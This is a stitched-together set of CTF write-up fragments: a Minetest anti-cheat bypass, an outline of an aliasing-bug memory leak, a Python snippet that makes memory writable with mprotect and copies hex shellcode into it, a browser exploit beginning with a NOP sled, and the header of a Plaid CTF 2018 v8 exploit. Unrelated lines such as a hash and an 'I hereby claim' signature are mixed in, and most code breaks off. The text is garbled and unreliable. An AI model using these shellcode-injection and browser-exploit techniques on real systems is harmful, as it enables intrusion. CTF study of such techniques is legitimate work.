300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This challenge required that you write cheats for a Minecraft clone to bypass a large wall.
There are tons of ways to solve this, but here was the main idea:
- There was a function that would, on the client side, return whether a player has certain privileges.
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent).
  - Also note, I didn't modify the server to ignore these; Minetest servers just do ¯\_(ツ)_/¯
- You can patch this function to return true, and the client can now toggle these abilities.
However, the binary had extra anti-cheat built in.
This challenge was a source-only pwnable based on an aliasing bug with -O2. Also, not all the source code was given.
Intended solution outline:
- In the source, in assignVotes, a voter and a candidate can become aliased, and -O2 optimization causes an incorrect return value.
  - If the person is the same as the candidate, it sets voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value.
  - Then, when going to print the error message, it instead tries to print the votes (if the value is greater than the address of main).
  - This will print whatever pointer is given, allowing memory to be leaked up to a null byte.
- Now with an arbitrary read, we can dump the binary and reverse the missing code.
- We can also leak libc addresses and dump libc (or take it from some other challenge).
```python
from timeit import timeit
from ctypes import *
'''
libc = CDLL('libc.so.6')
libc.mprotect(0x400000,0x1000,7)
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex')
#s = "\xc3"
libc.memcpy(0x400000, c_char_p(s),len(s))
```
I hereby claim:
To claim this, I am signing this object:
```python
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
                         InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
                         BranchType,
                         LowLevelILOperation, LLIL_TEMP,
                         LowLevelILLabel,
                         FlagRole,
                         LowLevelILFlagCondition,
                         log_error,
                         CallingConvention,
                         interaction,
```
```html
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
    sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
```
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9
```javascript
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to int in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
```